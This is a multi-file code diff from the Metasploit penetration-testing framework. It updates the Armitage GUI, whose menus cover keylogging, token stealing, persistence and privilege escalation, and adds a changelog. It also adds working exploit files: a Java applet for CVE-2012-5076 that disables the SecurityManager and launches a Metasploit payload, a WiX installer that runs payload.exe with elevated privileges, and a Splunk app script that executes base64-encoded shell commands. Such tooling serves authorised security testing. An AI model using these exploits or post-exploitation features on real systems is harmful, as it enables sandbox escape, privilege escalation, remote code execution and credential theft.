[$frame bindKey: "Ctrl+I", {
|
||||
thread({
|
||||
chooseSession($null, $null, $null, {
|
||||
local('$session');
|
||||
$session = sessionData($1);
|
||||
if ($session is $null) {
|
||||
showError("Session $1 does not exist");
|
||||
}
|
||||
else if ($session['desc'] eq "Meterpreter") {
|
||||
createMeterpreterTab($1);
|
||||
}
|
||||
else {
|
||||
createShellSessionTab(\$session, $sid => $1);
|
||||
}
|
||||
});
|
||||
});
|
||||
}];
|
||||
[$frame bindKey: "Ctrl+N", { thread(&createConsoleTab); }];
|
||||
[$frame bindKey: "Ctrl+W", { [$frame openActiveTab]; }];
|
||||
[$frame bindKey: "Ctrl+D", { [$frame closeActiveTab]; }];
|
||||
|
|
|
@ -104,13 +104,16 @@ sub parseMeterpreter {
|
|||
}
|
||||
|
||||
sub interpretMeterpreterCommand {
|
||||
if ([$1 getActionCommand] eq "shell") {
|
||||
local('$c');
|
||||
$c = [lc([$1 getActionCommand] . "") trim];
|
||||
|
||||
if ($c eq "shell") {
|
||||
createShellTab($sid);
|
||||
}
|
||||
else if ([$1 getActionCommand] eq "screenshot") {
|
||||
else if ($c eq "screenshot") {
|
||||
[createScreenshotViewer($sid)];
|
||||
}
|
||||
else if ([$1 getActionCommand] eq "webcam_snap") {
|
||||
else if ($c eq "webcam_snap") {
|
||||
[createWebcamViewer($sid)];
|
||||
}
|
||||
}
|
||||
|
@ -168,7 +171,9 @@ sub showMeterpreterMenu {
|
|||
}, $sid => "$sid"));
|
||||
|
||||
item($j, "Escalate Privileges", 'E', lambda({
|
||||
showPostModules($sid, "*escalate*");
|
||||
showPostModules($sid, "*escalate*",
|
||||
ohash(exploit => buildTree(filter({ return iff("*windows/local/*" iswm $1, $1); }, @exploits)))
|
||||
);
|
||||
}, $sid => "$sid"));
|
||||
|
||||
item($j, "Steal Token" , "S", lambda({
|
||||
|
@ -191,11 +196,15 @@ sub showMeterpreterMenu {
|
|||
}, $sid => "$sid"));
|
||||
|
||||
item($j, "Persist", 'P', lambda({
|
||||
launch_dialog("Persistence", "post", "windows/manage/persistence", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
|
||||
thread(lambda({
|
||||
launch_dialog("Persistence", "post", "windows/manage/persistence", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
|
||||
}, \$sid));
|
||||
}, $sid => "$sid"));
|
||||
|
||||
item($j, "Pass Session", 'S', lambda({
|
||||
launch_dialog("Pass Session", "post", "windows/manage/payload_inject", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
|
||||
thread(lambda({
|
||||
launch_dialog("Pass Session", "post", "windows/manage/payload_inject", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
|
||||
}, \$sid));
|
||||
}, $sid => "$sid"));
|
||||
|
||||
setupMenu($j, "meterpreter_access", @($sid));
|
||||
|
@ -241,7 +250,9 @@ sub showMeterpreterMenu {
|
|||
item($j, "Show Processes", 'P', lambda({ createProcessBrowser($sid); }, $sid => "$sid"));
|
||||
if ("*win*" iswm $platform) {
|
||||
item($j, "Log Keystrokes", 'K', lambda({
|
||||
launch_dialog("Log Keystrokes", "post", "windows/capture/keylog_recorder", 1, $null, %(SESSION => $sid, MIGRATE => 1, ShowKeystrokes => 1));
|
||||
thread(lambda({
|
||||
launch_dialog("Log Keystrokes", "post", "windows/capture/keylog_recorder", 1, $null, %(SESSION => $sid, MIGRATE => 1, ShowKeystrokes => 1));
|
||||
}, \$sid));
|
||||
}, $sid => "$sid"));
|
||||
}
|
||||
|
||||
|
@ -305,6 +316,9 @@ sub launch_msf_scans {
|
|||
if ('RPORT' in %o) {
|
||||
$port = %o['RPORT']['default'];
|
||||
push(%ports[$port], $scanner);
|
||||
if ($port == 80) {
|
||||
push(%ports['443'], $scanner);
|
||||
}
|
||||
}
|
||||
|
||||
safetyCheck();
|
||||
|
@ -313,7 +327,7 @@ sub launch_msf_scans {
|
|||
|
||||
# add these ports to our list of ports to scan.. these come from querying all of Metasploit's modules
|
||||
# for the default ports
|
||||
foreach $port (@(50000, 21, 1720, 80, 443, 143, 3306, 1521, 110, 5432, 50013, 25, 161, 22, 23, 17185, 135, 8080, 4848, 1433, 5560, 512, 513, 514, 445, 5900, 5038, 111, 139, 49, 515, 7787, 2947, 7144, 9080, 8812, 2525, 2207, 3050, 5405, 1723, 1099, 5555, 921, 10001, 123, 3690, 548, 617, 6112, 6667, 3632, 783, 10050, 38292, 12174, 2967, 5168, 3628, 7777, 6101, 10000, 6504, 41523, 41524, 2000, 1900, 10202, 6503, 6070, 6502, 6050, 2103, 41025, 44334, 2100, 5554, 12203, 26000, 4000, 1000, 8014, 5250, 34443, 8028, 8008, 7510, 9495, 1581, 8000, 18881, 57772, 9090, 9999, 81, 3000, 8300, 8800, 8090, 389, 10203, 5093, 1533, 13500, 705, 623, 4659, 20031, 16102, 6080, 6660, 11000, 19810, 3057, 6905, 1100, 10616, 10628, 5051, 1582, 65535, 105, 22222, 30000, 113, 1755, 407, 1434, 2049, 689, 3128, 20222, 20034, 7580, 7579, 38080, 12401, 910, 912, 11234, 46823, 5061, 5060, 2380, 69, 5800, 62514, 42, 5631, 902)) {
|
||||
foreach $port (@(50000, 21, 1720, 80, 443, 143, 3306, 1521, 110, 5432, 50013, 25, 161, 22, 23, 17185, 135, 8080, 4848, 1433, 5560, 512, 513, 514, 445, 5900, 5038, 111, 139, 49, 515, 7787, 2947, 7144, 9080, 8812, 2525, 2207, 3050, 5405, 1723, 1099, 5555, 921, 10001, 123, 3690, 548, 617, 6112, 6667, 3632, 783, 10050, 38292, 12174, 2967, 5168, 3628, 7777, 6101, 10000, 6504, 41523, 41524, 2000, 1900, 10202, 6503, 6070, 6502, 6050, 2103, 41025, 44334, 2100, 5554, 12203, 26000, 4000, 1000, 8014, 5250, 34443, 8028, 8008, 7510, 9495, 1581, 8000, 18881, 57772, 9090, 9999, 81, 3000, 8300, 8800, 8090, 389, 10203, 5093, 1533, 13500, 705, 623, 4659, 20031, 16102, 6080, 6660, 11000, 19810, 3057, 6905, 1100, 10616, 10628, 5051, 1582, 65535, 105, 22222, 30000, 113, 1755, 407, 1434, 2049, 689, 3128, 20222, 20034, 7580, 7579, 38080, 12401, 910, 912, 11234, 46823, 5061, 5060, 2380, 69, 5800, 62514, 42, 5631, 902, 5985)) {
|
||||
$temp = %ports[$port];
|
||||
}
|
||||
|
||||
|
@ -343,7 +357,12 @@ sub launch_msf_scans {
|
|||
if ($port in %ports) {
|
||||
$modules = %ports[$port];
|
||||
foreach $module ($modules) {
|
||||
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24)));
|
||||
if ($port == 443) {
|
||||
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24, SSL => "1")));
|
||||
}
|
||||
else {
|
||||
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24)));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
@ -251,7 +251,7 @@ sub showExploitModules {
|
|||
# shows the post modules compatible with a session... for this to work, the
|
||||
# code that creates the module browser must call: let(&showPostModules, $tree => ..., $search => ...)
|
||||
sub showPostModules {
|
||||
local('@allowed $2');
|
||||
local('@allowed $2 $3');
|
||||
@allowed = getOS(sessionToOS($1));
|
||||
fork({
|
||||
local('$modules %list $model');
|
||||
|
@ -270,7 +270,13 @@ sub showPostModules {
|
|||
$modules = filter(lambda({ return iff($filter iswm $1, $1); }, \$filter), $modules);
|
||||
}
|
||||
|
||||
%list = ohash(post => buildTree($modules));
|
||||
if ($base is $null) {
|
||||
%list = ohash(post => buildTree($modules));
|
||||
}
|
||||
else {
|
||||
%list = $base;
|
||||
%list['post'] = buildTree($modules);
|
||||
}
|
||||
$model = treeNodes($null, %list);
|
||||
|
||||
dispatchEvent(lambda({
|
||||
|
@ -282,7 +288,7 @@ sub showPostModules {
|
|||
}
|
||||
[$search setText: ""];
|
||||
}, \$search, \$tree, \$model));
|
||||
}, \$tree, \$search, $sid => $1, \$client, \@allowed, $filter => $2);
|
||||
}, \$tree, \$search, $sid => $1, \$client, \@allowed, $filter => $2, $base => $3);
|
||||
}
|
||||
|
||||
sub createModuleBrowserTab {
|
||||
|
|
|
@ -96,6 +96,33 @@ sub createCredentialsTab {
|
|||
($dialog, $table, $model) = show_hashes("", 320);
|
||||
[$dialog removeAll];
|
||||
|
||||
addMouseListener($table, lambda({
|
||||
if ([$1 isPopupTrigger]) {
|
||||
local('$popup $entries');
|
||||
$popup = [new JPopupMenu];
|
||||
$entries = [$model getSelectedValuesFromColumns: $table, @("user", "pass", "host")];
|
||||
item($popup, "Delete", 'D', lambda({
|
||||
local('$queue $entry $user $pass $host');
|
||||
$queue = [new armitage.ConsoleQueue: $client];
|
||||
foreach $entry ($entries) {
|
||||
($user, $pass, $host) = $entry;
|
||||
[$queue addCommand: $null, "creds -d $host -u $user -P $pass"];
|
||||
}
|
||||
|
||||
[$queue addCommand: "x", "creds -h"];
|
||||
|
||||
[$queue addListener: lambda({
|
||||
[$queue stop];
|
||||
refreshCredsTable($model, $null);
|
||||
}, \$model, \$queue)];
|
||||
|
||||
[$queue start];
|
||||
[$queue stop];
|
||||
}, \$table, \$model, \$entries));
|
||||
[$popup show: [$1 getSource], [$1 getX], [$1 getY]];
|
||||
}
|
||||
}, \$table, \$model));
|
||||
|
||||
$panel = [new JPanel];
|
||||
[$panel setLayout: [new BorderLayout]];
|
||||
[$panel add: [new JScrollPane: $table], [BorderLayout CENTER]];
|
||||
|
@ -297,19 +324,24 @@ sub show_login_dialog {
|
|||
}
|
||||
|
||||
sub createUserPassFile {
|
||||
local('$handle $user $pass $type $row $2 $name');
|
||||
local('$handle $user $pass $type $row $2 $name %entries');
|
||||
$name = "userpass" . rand(10000) . ".txt";
|
||||
|
||||
$handle = openf("> $+ $name");
|
||||
# loop through our entries and store them
|
||||
%entries = ohash();
|
||||
foreach $row ($1) {
|
||||
($user, $pass, $type) = values($row, @("user", "pass", "ptype"));
|
||||
if ($type eq "password" || $type eq $2) {
|
||||
println($handle, "$user $pass");
|
||||
%entries["$user $pass"] = "$user $pass";
|
||||
}
|
||||
else {
|
||||
println($handle, "$user");
|
||||
%entries[$user] = $user;
|
||||
}
|
||||
}
|
||||
|
||||
# print out unique entry values
|
||||
$handle = openf("> $+ $name");
|
||||
printAll($handle, values(%entries));
|
||||
closef($handle);
|
||||
|
||||
if ($client !is $mclient) {
|
||||
|
|
|
@ -27,6 +27,12 @@ sub parseProcessList {
|
|||
# REMOVEME--this is a backwards compatability hack.
|
||||
@rows = parseTextTable($2, @("PID", "Name", "Arch", "Session", "User", "Path"));
|
||||
}
|
||||
|
||||
# this is the format for Java meterpreter
|
||||
if (size(@rows) == 0) {
|
||||
@rows = parseTextTable($2, @("PID", "Name", "Arch", "User", "Path"));
|
||||
}
|
||||
|
||||
foreach $row (@rows) {
|
||||
[%processes[$1] addEntry: $row];
|
||||
}
|
||||
|
@ -69,7 +75,7 @@ sub createProcessBrowser {
|
|||
|
||||
[$panel add: [new JScrollPane: $table], [BorderLayout CENTER]];
|
||||
|
||||
local('$a $b $bb $c');
|
||||
local('$a $b $bb $bbb $c');
|
||||
$a = [new JButton: "Kill"];
|
||||
[$a addActionListener: lambda({
|
||||
local('$procs $v');
|
||||
|
@ -99,6 +105,15 @@ sub createProcessBrowser {
|
|||
}
|
||||
}, $m => $1, \$table, \$model)];
|
||||
|
||||
$bbb = [new JButton: "Steal Token"];
|
||||
[$bbb addActionListener: lambda({
|
||||
local('$v');
|
||||
$v = [$model getSelectedValue: $table];
|
||||
if ($v !is $null) {
|
||||
m_cmd_callback($m, "steal_token $v", { if ($0 eq "end") { showError(["$2" trim]); } });
|
||||
}
|
||||
}, $m => $1, \$table, \$model)];
|
||||
|
||||
$c = [new JButton: "Refresh"];
|
||||
[$c addActionListener:
|
||||
lambda({
|
||||
|
@ -106,7 +121,7 @@ sub createProcessBrowser {
|
|||
}, $m => $1)
|
||||
];
|
||||
|
||||
[$panel add: center($a, $b, $bb, $c), [BorderLayout SOUTH]];
|
||||
[$panel add: center($a, $b, $bb, $bbb, $c), [BorderLayout SOUTH]];
|
||||
|
||||
[$frame addTab: "Processes $1", $panel, $null, "Processes " . sessionToHost($1)];
|
||||
m_cmd($1, "ps");
|
||||
|
|
|
@ -355,7 +355,7 @@ sub client {
|
|||
|
||||
sub main {
|
||||
global('$client $mclient');
|
||||
local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle');
|
||||
local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle $console');
|
||||
|
||||
$auth = unpack("H*", digest(rand() . ticks(), "MD5"))[0];
|
||||
|
||||
|
@ -400,9 +400,6 @@ sub main {
|
|||
$mclient = $client;
|
||||
initConsolePool(); # this needs to happen... right now.
|
||||
|
||||
# set the LHOST to whatever the user specified
|
||||
call_async($client, "core.setg", "LHOST", $host);
|
||||
|
||||
# we need this global to be set so our reverse listeners work as expected.
|
||||
$MY_ADDRESS = $host;
|
||||
|
||||
|
@ -423,6 +420,13 @@ sub main {
|
|||
$lock_lock = semaphore(1);
|
||||
$cach_lock = semaphore(1);
|
||||
|
||||
# set the LHOST to whatever the user specified (use console.write to make the string not UTF-8)
|
||||
$console = createConsole($client);
|
||||
call($client, "console.write", $console, "setg LHOST $host $+ \n");
|
||||
sleep(2000);
|
||||
# absorb the output of this command which is LHOST => ...
|
||||
call($client, "console.read", $console);
|
||||
|
||||
#
|
||||
# create a thread to push console messages to the event queue for all clients.
|
||||
#
|
||||
|
@ -437,7 +441,7 @@ sub main {
|
|||
release($poll_lock);
|
||||
}
|
||||
}
|
||||
}, \$client, \$poll_lock, \@events, $console => createConsole($client));
|
||||
}, \$client, \$poll_lock, \@events, \$console);
|
||||
|
||||
#
|
||||
# Create a shared hash that contains a thread for each session...
|
||||
|
|
|
@ -163,6 +163,10 @@ global('%shells $ashell $achannel %maxq %wait');
|
|||
# make our shell heuristic tolerant of prompts like this.
|
||||
%wait[$achannel] = $null;
|
||||
}
|
||||
else if (size($v) > 0 && $v[-1] ismatch '.*?:') {
|
||||
# make our shell heuristic tolerant of more prompts... this is from the time command
|
||||
%wait[$achannel] = $null;
|
||||
}
|
||||
else if (size($v) > 0 && $v[-1] !ismatch '(.*?):\\\\.*?\\>') {
|
||||
m_cmd($1, "read $achannel");
|
||||
}
|
||||
|
@ -254,7 +258,14 @@ sub showShellMenu {
|
|||
}
|
||||
|
||||
item($1, "Post Modules", 'P', lambda({
|
||||
showPostModules($sid);
|
||||
if ("*Windows*" iswm sessionToOS($sid)) {
|
||||
showPostModules($sid);
|
||||
}
|
||||
else {
|
||||
showPostModules($sid, "*",
|
||||
ohash(exploit => buildTree(filter({ return iff("*u*x/local/*" iswm $1, $1); }, @exploits)))
|
||||
);
|
||||
}
|
||||
}, \$sid));
|
||||
|
||||
separator($1);
|
||||
|
|
|
@ -152,7 +152,10 @@ sub createConsoleTab {
|
|||
|
||||
sub setg {
|
||||
%MSF_GLOBAL[$1] = $2;
|
||||
call_async($client, "core.setg", $1, $2);
|
||||
local('$c');
|
||||
$c = createConsole($client);
|
||||
call_async($client, "console.write", $c, "setg $1 $2 $+ \n");
|
||||
call_async($client, "console.release", $c);
|
||||
}
|
||||
|
||||
sub createDefaultHandler {
|
||||
|
|
|
@ -104,6 +104,9 @@ public class ConsoleClient implements Runnable, ActionListener {
|
|||
if (destroyCommand != null) {
|
||||
((RpcAsync)connection).execute_async(destroyCommand, new Object[] { session });
|
||||
}
|
||||
|
||||
/* we don't need to keep reading from this console */
|
||||
kill();
|
||||
}
|
||||
|
||||
protected void finalize() {
|
||||
|
|
|
@ -164,6 +164,21 @@ public class MeterpreterSession implements Runnable {
|
|||
readUntilSuccessful(c, false);
|
||||
return;
|
||||
}
|
||||
else if (c.text.startsWith("add_user") && !teammode) {
|
||||
/* when -h [host] is specified, attempts to add a user on another
|
||||
host. In this case, output is split into multiple chunks.
|
||||
This applies to add_localgroup_user and add_group_user too. */
|
||||
readUntilSuccessful(c, false);
|
||||
return;
|
||||
}
|
||||
else if (c.text.startsWith("add_localgroup_user") && !teammode) {
|
||||
readUntilSuccessful(c, false);
|
||||
return;
|
||||
}
|
||||
else if (c.text.startsWith("add_group_user") && !teammode) {
|
||||
readUntilSuccessful(c, false);
|
||||
return;
|
||||
}
|
||||
|
||||
//System.err.println("(" + session + ") latency: " + (System.currentTimeMillis() - c.start) + " -- " + c.text);
|
||||
|
||||
|
|
|
@ -57,6 +57,13 @@ public class MsgRpcImpl extends RpcConnectionImpl {
|
|||
/* login to msf server */
|
||||
Object[] params = new Object[]{ username, password };
|
||||
Map results = exec("auth.login",params);
|
||||
|
||||
/* save the temp token (lasts for 5 minutes of inactivity) */
|
||||
rpcToken = results.get("token").toString();
|
||||
|
||||
/* generate a non-expiring token and use that */
|
||||
params = new Object[]{ rpcToken };
|
||||
results = exec("auth.token_generate", params);
|
||||
rpcToken = results.get("token").toString();
|
||||
}
|
||||
|
||||
|
|
|
@ -33,10 +33,6 @@ public class KeyBindings implements KeyEventDispatcher {
|
|||
}
|
||||
|
||||
public boolean dispatchKeyEvent(KeyEvent ev) {
|
||||
if (ev.getID() != KeyEvent.KEY_PRESSED) {
|
||||
return false;
|
||||
}
|
||||
|
||||
StringBuffer description = new StringBuffer();
|
||||
if (ev.getModifiers() != 0) {
|
||||
description.append(getKeyModifiers(ev));
|
||||
|
@ -46,9 +42,14 @@ public class KeyBindings implements KeyEventDispatcher {
|
|||
|
||||
synchronized (this) {
|
||||
if (bindings.containsKey(description.toString())) {
|
||||
SwingUtilities.invokeLater(new ExecuteBinding(description.toString(), (KeyHandler)bindings.get(description.toString())));
|
||||
ev.consume();
|
||||
return true;
|
||||
if (ev.getID() != KeyEvent.KEY_PRESSED) {
|
||||
return false;
|
||||
}
|
||||
else {
|
||||
SwingUtilities.invokeLater(new ExecuteBinding(description.toString(), (KeyHandler)bindings.get(description.toString())));
|
||||
return true;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
|
|
@ -1,6 +1,46 @@
|
|||
Armitage Changelog
|
||||
==================
|
||||
|
||||
26 Nov 12 (tested against msf 16114)
|
||||
---------
|
||||
- Windows command shell tab is now friendlier to commands that prompt
|
||||
for input (e.g., time command)
|
||||
- [host] -> Meterpreter -> Access -> Escalate Privileges now shows all
|
||||
the framework's new exploit/windows/local modules too
|
||||
- [host] -> Shell -> Post Modules now shows the framework's unix/local
|
||||
and exploit/linux/local modules
|
||||
- Added Ctrl+I shortcut. Lets you choose a session to interact with.
|
||||
- Added Steal Token button to Processes dialog.
|
||||
- Armitage now asks Metasploit for a non-expiring authentication token.
|
||||
This will prevent Armitage from losing its access to msfrpcd when you
|
||||
put your computer to sleep or pause the VM running Metasploit.
|
||||
- add_user and add_[local]group_user now show all of their output when
|
||||
the -h flag is used to operate on a remote host.
|
||||
- added a Delete menu to creds table. Right-click a cred to delete it
|
||||
|
||||
Cortana Updates (for scripters)
|
||||
--------
|
||||
- aliased &data_delete to &data_clear to match the documentation.
|
||||
- &file_get, &loot_get, and &file_content no longer delete the remote
|
||||
file when connected to a teamserver.
|
||||
|
||||
16 Oct 12 (tested against msf 15972)
|
||||
---------
|
||||
- Added port 5985 to MSF Scans list.
|
||||
- Meterpreter -> Access -> Persistence sets ACTION option for you
|
||||
- Changed how LHOST and LPORT are set globally to prevent Ruby
|
||||
character encoding conversion error in the framework.
|
||||
- Pass Session, Log Keystrokes, and Persist now query module info
|
||||
in a separate thread (avoids a deadlock opportunity)
|
||||
- Armitage now shows folder/URL in a popup dialog for environments
|
||||
where JDesktop API to open them directly is not supported
|
||||
- Check all credentials option now filters the list to avoid trying
|
||||
a pair of credentials twice.
|
||||
- Armitage's exploit payload selection now selects cmd/unix/interact
|
||||
when appropriate.
|
||||
- Explore -> Processes now works with Java Meterpreter again.
|
||||
- MSF Scans feature now runs http_version against port 443
|
||||
|
||||
5 Sept 12 (tested against msf r15804)
|
||||
---------
|
||||
- Setup dialog now trims host, port, user, and pass fields.
|
||||
|
|
|
@ -0,0 +1,69 @@
|
|||
import java.applet.Applet;
|
||||
import java.io.PrintStream;
|
||||
import java.io.Serializable;
|
||||
import java.lang.reflect.Method;
|
||||
import com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory;
|
||||
import com.sun.org.glassfish.gmbal.util.GenericConstructor;
|
||||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.IOException;
|
||||
import java.io.InputStream;
|
||||
import java.io.ObjectInputStream;
|
||||
import java.io.ObjectOutputStream;
|
||||
import metasploit.Payload;
|
||||
//import java.lang.Runtime;
|
||||
|
||||
public class Exploit extends Applet
|
||||
{
|
||||
|
||||
public Exploit()
|
||||
{
|
||||
}
|
||||
|
||||
public byte[] hex2Byte(String str)
|
||||
{
|
||||
byte[] bytes = new byte[str.length() / 2];
|
||||
for (int i = 0; i < bytes.length; i++)
|
||||
{
|
||||
bytes[i] = (byte) Integer
|
||||
.parseInt(str.substring(2 * i, 2 * i + 2), 16);
|
||||
}
|
||||
return bytes;
|
||||
}
|
||||
|
||||
|
||||
public void init()
|
||||
{
|
||||
try
|
||||
{
|
||||
ByteArrayOutputStream bos = new ByteArrayOutputStream();
|
||||
byte[] buffer = new byte[8192];
|
||||
int length;
|
||||
|
||||
// read in the class file from the jar
|
||||
InputStream is = getClass().getResourceAsStream("MyPayload.class");
|
||||
// and write it out to the byte array stream
|
||||
while( ( length = is.read( buffer ) ) > 0 )
|
||||
bos.write( buffer, 0, length );
|
||||
// convert it to a simple byte array
|
||||
buffer = bos.toByteArray();
|
||||
|
||||
GenericConstructor genericconstructor = new GenericConstructor(Object.class, "sun.invoke.anon.AnonymousClassLoader", new Class[0]);
|
||||
Object obj = genericconstructor.create(new Object[] {});
|
||||
Method method = ManagedObjectManagerFactory.getMethod(obj.getClass(), "loadClass", new Class[] { byte[].class });
|
||||
Class class1 = (Class)method.invoke(obj, new Object[] {
|
||||
//byte_payload
|
||||
buffer
|
||||
});
|
||||
class1.newInstance();
|
||||
//System.out.println("SecurityManager:" + System.getSecurityManager());
|
||||
//class1.getMethod("r", new Class[0]).invoke(class1, new Object[0]);
|
||||
Payload.main(null);
|
||||
//Runtime.getRuntime().exec("calc.exe");
|
||||
}
|
||||
catch(Exception exception)
|
||||
{
|
||||
//exception.printStackTrace();
|
||||
}
|
||||
}
|
||||
|
||||
}
|
|
@ -0,0 +1,18 @@
|
|||
# rt.jar must be in the classpath!
|
||||
|
||||
CLASSES = \
|
||||
Exploit.java \
|
||||
MyPayload.java
|
||||
|
||||
.SUFFIXES: .java .class
|
||||
.java.class:
|
||||
javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
|
||||
|
||||
all: $(CLASSES:.java=.class)
|
||||
|
||||
install:
|
||||
mv Exploit.class ../../../../data/exploits/cve-2012-5076/
|
||||
mv MyPayload.class ../../../../data/exploits/cve-2012-5076/
|
||||
|
||||
clean:
|
||||
rm -rf *.class
|
|
@ -0,0 +1,33 @@
|
|||
import java.security.*;
|
||||
|
||||
public class MyPayload
|
||||
implements PrivilegedExceptionAction
|
||||
{
|
||||
|
||||
public MyPayload()
|
||||
{
|
||||
try
|
||||
{
|
||||
AccessController.doPrivileged(this);
|
||||
}
|
||||
catch(PrivilegedActionException e)
|
||||
{
|
||||
//e.printStackTrace();
|
||||
}
|
||||
}
|
||||
|
||||
public Object run()
|
||||
throws Exception
|
||||
{
|
||||
System.setSecurityManager(null);
|
||||
return null;
|
||||
}
|
||||
|
||||
public static void r()
|
||||
throws Exception
|
||||
{
|
||||
//System.out.println("hello!");
|
||||
}
|
||||
|
||||
|
||||
}
|
|
@ -0,0 +1,29 @@
|
|||
<?xml version='1.0' encoding='windows-1252'?>
|
||||
<Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
|
||||
<Product Name='Foobar 1.0' Id='*'
|
||||
Language='1033' Codepage='1252' Version='1.0.0' Manufacturer='Acme Ltd.'>
|
||||
|
||||
<Package InstallerVersion="100" Languages="0" Manufacturer="Acme Ltd." ReadOnly="no" />
|
||||
|
||||
<Media Id='1' Cabinet='product.cab' EmbedCab='yes' />
|
||||
|
||||
<Directory Id='TARGETDIR' Name='SourceDir'>
|
||||
<Component Id='MyComponent' Guid='12345678-1234-1234-1234-123456789012'>
|
||||
<Condition>0</Condition>
|
||||
</Component>
|
||||
</Directory>
|
||||
|
||||
<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
|
||||
<CustomAction Id='ExecNotepad' Directory='TARGETDIR' Impersonate='no' Execute='deferred' ExeCommand='[SourceDir]payload.exe' Return='asyncNoWait'/>
|
||||
|
||||
<Feature Id='Complete' Level='1'>
|
||||
<ComponentRef Id='MyComponent' />
|
||||
</Feature>
|
||||
|
||||
<InstallExecuteSequence>
|
||||
<ResolveSource After="CostInitialize" />
|
||||
<Custom Action="ExecNotepad" After="InstallInitialize" />
|
||||
</InstallExecuteSequence>
|
||||
|
||||
</Product>
|
||||
</Wix>
|
|
@ -0,0 +1,15 @@
|
|||
import sys
|
||||
import base64
|
||||
import splunk.Intersplunk
|
||||
|
||||
results = []
|
||||
|
||||
try:
|
||||
sys.modules['os'].system(base64.b64decode(sys.argv[1]))
|
||||
|
||||
except:
|
||||
import traceback
|
||||
stack = traceback.format_exc()
|
||||
results = splunk.Intersplunk.generateErrorResults("Error : Traceback: " + str(stack))
|
||||
|
||||
splunk.Intersplunk.outputResults(results)
|
|
@ -0,0 +1,7 @@
|
|||
[launcher]
|
||||
author=Marc Wickenden
|
||||
description=Metasploit module spunk_upload_app_exec.rb
|
||||
version=1.3.3.7
|
||||
|
||||
[ui]
|
||||
is_visible = true
|
|
@ -0,0 +1,7 @@
|
|||
[msf_exec]
|
||||
type = python
|
||||
filename = msf_exec.py
|
||||
local = false
|
||||
enableheader = false
|
||||
streaming = false
|
||||
perf_warn_limit = 0
|
|
@ -0,0 +1,2 @@
|
|||
[commands]
|
||||
export = system
|
|
@ -13,6 +13,7 @@ import java.awt.event.FocusListener;
|
|||
import java.awt.event.MouseAdapter;
|
||||
import java.awt.event.MouseEvent;
|
||||
import java.awt.event.MouseMotionAdapter;
|
||||
import java.awt.event.MouseMotionListener;
|
||||
import java.awt.event.WindowEvent;
|
||||
import java.awt.event.WindowFocusListener;
|
||||
import java.util.ArrayList;
|
||||
|
@ -49,7 +50,16 @@ public class DraggableTabbedPane extends JTabbedPane{
|
|||
static{
|
||||
//Set up placeholder window. (Shows when moving tabs)
|
||||
window = new JWindow();
|
||||
window.getContentPane().add(new JLabel("Moving", JLabel.CENTER), java.awt.BorderLayout.CENTER);
|
||||
JLabel lab = new JLabel("Moving", JLabel.CENTER);
|
||||
lab.addMouseMotionListener(new MouseMotionListener() {
|
||||
public void mouseMoved(MouseEvent e) {
|
||||
window.setVisible(false);
|
||||
}
|
||||
public void mouseDragged(MouseEvent e) {
|
||||
window.setVisible(false);
|
||||
}
|
||||
});
|
||||
window.getContentPane().add(lab, java.awt.BorderLayout.CENTER);
|
||||
window.setSize(300, 300);
|
||||
}
|
||||
|
||||
|
@ -333,7 +343,7 @@ public class DraggableTabbedPane extends JTabbedPane{
|
|||
//Set up dragging listener
|
||||
addMouseMotionListener(new MouseMotionAdapter() {
|
||||
public void mouseDragged(MouseEvent e) {
|
||||
if (!dragging) {
|
||||
if (!dragging && ((e.getModifiersEx() & MouseEvent.BUTTON1_DOWN_MASK) != 0)) {
|
||||
// Gets the tab index based on the mouse position
|
||||
int tabNumber = getUI().tabForCoordinate(DraggableTabbedPane.this, e.getX(), e.getY());
|
||||
if (tabNumber < 0)
|
||||
|
|
|
@ -423,7 +423,12 @@ nameloop: for (int i = 0; i < names.length; i++) {
|
|||
public ActionListener getActor(final String modName, final String type, final RpcConnection rpcConn) {
|
||||
return new ActionListener(){
|
||||
public void actionPerformed(ActionEvent e) {
|
||||
new ModulePopup(modName,rpcConn,type, MainFrame.this).setVisible(true);
|
||||
//If we have saved options for this module, use those
|
||||
Object modOptions = MsfguiApp.getPropertiesNode().get("modOptions");
|
||||
if(modOptions != null && ((Map)modOptions).containsKey(type+" "+modName))
|
||||
new ModulePopup(rpcConn, ((List)((Map)modOptions).get(type+" "+modName)).toArray(), MainFrame.this).setVisible(true);
|
||||
else //otherwise go with the default
|
||||
new ModulePopup(modName,rpcConn,type, MainFrame.this).setVisible(true);
|
||||
}
|
||||
};
|
||||
}
|
||||
|
|
|
@ -287,12 +287,19 @@ public class MsfguiApp extends SingleFrameApplication {
|
|||
}
|
||||
Map hash = (Map)args.get(2);
|
||||
StringBuilder name = new StringBuilder(args.get(0) + " " + args.get(1));
|
||||
//Save these options
|
||||
if(!propRoot.containsKey("modOptions")) //first ensure option map exists
|
||||
propRoot.put("modOptions", new HashMap());
|
||||
((Map)propRoot.get("modOptions")).put(name.toString(), args);
|
||||
|
||||
//Generate display name
|
||||
for(Object ento : hash.entrySet()){
|
||||
Entry ent = (Entry)ento;
|
||||
String propName = ent.getKey().toString();
|
||||
if(propName.endsWith("HOST") || propName.endsWith("PORT") || propName.equals("PAYLOAD"))
|
||||
name.append(" ").append(propName).append("-").append(ent.getValue());
|
||||
}
|
||||
//Make menu item
|
||||
final JMenuItem item = new JMenuItem(name.toString());
|
||||
item.addActionListener(new ActionListener() {
|
||||
public void actionPerformed(ActionEvent e) {
|
||||
|
|
|
